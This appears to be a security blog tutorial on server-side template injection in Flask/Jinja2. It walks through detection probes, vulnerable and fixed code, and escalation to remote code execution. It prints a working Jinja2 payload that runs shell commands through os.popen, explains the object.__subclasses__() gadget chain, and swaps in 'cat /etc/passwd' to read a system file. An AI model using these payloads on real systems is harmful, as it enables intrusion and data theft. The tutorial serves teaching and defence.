
Server-Side Template Injection(SSTI) to Remote Code Execution (RCE)


Hello Hackers,

Let’s read some Cybersecurity Blogs…

Today we will learn about Server-Side Template Injection (SSTI), a vulnerability that is very easy to exploit but has a critical impact: the attacker's input is evaluated by the server's template engine, and in many engines this can be escalated to executing arbitrary commands on the victim's web server.

So let's start. The first thing we need to find on the website is an injection point, such as a search bar, a username or a name field, whose value is reflected back to us in the response.

I found one injection point that reflects my value back: the page responds with Hi, <value>.

You might wonder what the backend code looks like and how it reflects the value, so here is its code.

The code above shows that the user-supplied value ends up inside the template itself rather than being passed to it as data, which is exactly what makes the web application vulnerable to SSTI, so we can start exploiting it.

For exploiting SSTI there are many payloads, but the simplest payload to verify whether the web application is vulnerable is {{<any operation>}}, for example {{7*7}}. If the template engine evaluates the payload, the response will contain the product 49 instead of the literal text. You can use any numbers and any operator such as +, -, *, /, %, or a comparison like <. Two practical notes: if the number 49 already appears somewhere on the page, use larger or less common operands so the result cannot be mistaken for existing content, and a probe like {{7*'7'}} helps identify the engine, since Jinja2 (Python) prints 7777777 while Twig (PHP) prints 49.
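The backend screenshot referred to above is not reproduced on this page. As an added example, not the author's code, here is the Flask/Jinja2 pattern that produces the described behaviour (Hi, <value> with {{7*7}} evaluated), next to the fixed version, together with the detection probes from this section. It uses Jinja2 directly (assumed installed: pip install jinja2) instead of a running Flask application so it executes offline; the function names and the probe table are mine.

```python
from jinja2 import Environment

# autoescape only protects against HTML injection in DATA; it does nothing
# against SSTI, because the attacker's input becomes part of the template SOURCE.
env = Environment(autoescape=True)


def greet_vulnerable(name: str) -> str:
    """Vulnerable pattern: the user-controlled value is concatenated into the
    template string, so any {{ ... }} inside it is parsed and evaluated by Jinja2.
    In Flask this is render_template_string("Hi, " + name)."""
    return env.from_string("Hi, " + name).render()


def greet_fixed(name: str) -> str:
    """Fixed pattern: the template is a constant and the value is supplied as
    render-time data, so braces in the input are just text.
    In Flask this is render_template_string("Hi, {{ name }}", name=name)."""
    return env.from_string("Hi, {{ name }}").render(name=name)


# Probe payloads and the substring each one should produce if it is evaluated.
# Unusual operands avoid a false positive when "49" already appears on the page.
PROBES = {
    "{{7*7}}": "49",             # arithmetic evaluated: some template engine is present
    "{{1337*1337}}": "1787569",  # same check with a value unlikely to occur naturally
    "{{7*'7'}}": "7777777",      # Python string repetition: Jinja2 (Twig would print 49)
}


def probe(render) -> dict:
    """Feed every probe through the reflecting function and report which
    expected results came back; each True means the input was evaluated."""
    return {payload: expected in render(payload) for payload, expected in PROBES.items()}


if __name__ == "__main__":
    print(greet_vulnerable("{{7*7}}"))  # Hi, 49
    print(greet_fixed("{{7*7}}"))       # Hi, {{7*7}}
    print(probe(greet_vulnerable))      # every probe True
    print(probe(greet_fixed))           # every probe False
```

Running probe() against the fixed function returns all False: the quote in {{7*'7'}} is even HTML-escaped on output, which is the autoescape doing its separate job. The fix is not escaping but keeping user input out of the template source entirely.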

Escalating SSTI to RCE

Once you have confirmed that the web application is vulnerable to SSTI, escalating it to RCE (Remote Code Execution) is usually straightforward: identify the template engine, then try the payloads known to work for that engine, which you can collect from public payload repositories on GitHub and other websites. The payload below targets Jinja2 running under Flask: starting from the Flask request object it reaches Python's builtins, imports the os module and runs a shell command.

{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}

I used the above payload to get RCE on the website; it runs whoami and reflects the name of the user account the web server is running as.
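Why does that payload work? Every Python function or method object carries __globals__, the dictionary of the module it was defined in, and every module dictionary holds __builtins__, which exposes __import__. In Flask, request.application resolves to a method of the Werkzeug request object, so the payload climbs method, then module globals, then builtins, then __import__('os'). The following added example (my code, not the author's) shows the same chain in plain Python, because the introspection happens in Python no matter what the template syntax is: once from any callable in scope, mirroring the page's payload, and once through the object.__subclasses__() route that payload collections fall back to when nothing like request is available. It runs a harmless constructed command (echo) instead of whoami; the helper names are mine.

```python
import os


def import_from_callable(fn):
    """The page's payload shape: <callable>.__globals__['__builtins__'].__import__
    Any function or bound method exposes the globals of its defining module, and
    every module's globals contain __builtins__ (the builtins module in __main__,
    a plain dict in other modules, so both cases are handled)."""
    builtins = fn.__globals__["__builtins__"]
    if isinstance(builtins, dict):
        return builtins["__import__"]
    return builtins.__import__


def import_from_subclasses():
    """Fallback when no convenient object is in template scope:
    ''.__class__.__mro__[1] is `object`; walk its direct subclasses for one
    defined in Python, whose own __init__ is a real function with __globals__."""
    for cls in object.__subclasses__():
        init = cls.__dict__.get("__init__")  # only this class's own __init__, not inherited
        module_globals = getattr(init, "__globals__", None)  # None for C slot wrappers
        if isinstance(module_globals, dict) and "__builtins__" in module_globals:
            return cls.__name__, import_from_callable(init)
    raise RuntimeError("no Python-defined subclass of object found")


def run_via_gadget(cmd, imp=None):
    """Equivalent of __import__('os').popen(cmd).read() at the end of the payload."""
    if imp is None:
        _, imp = import_from_subclasses()
    return imp("os").popen(cmd).read()


if __name__ == "__main__":
    # os.popen is an ordinary function defined in the os module; it stands in
    # for request.application here (constructed demo, harmless command).
    print(run_via_gadget("echo ssti-demo", import_from_callable(os.popen)))
    gadget_name, _ = import_from_subclasses()
    print("gadget class:", gadget_name)
    print(run_via_gadget("echo ssti-demo"))
```

The takeaway for defenders is that sandboxing the template context (removing request, config and friends) is not enough on its own: any object that survives in scope, even an empty string, still reaches object.__subclasses__() and from there the interpreter's builtins, which is why a constant template with user input passed as data is the only reliable fix.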

Now my final task is to view the /etc/passwd file, so I replaced the whoami command in the payload with cat /etc/passwd.

SSTI can also be found in email templates (set your username to an SSTI payload and check the email you receive), comment fields, and many other places where user input is rendered through a template.

So that's all for today and it's time to say bye!

Happy Hacking !!

If you feel this blog added something to your skills, please share it with others too.
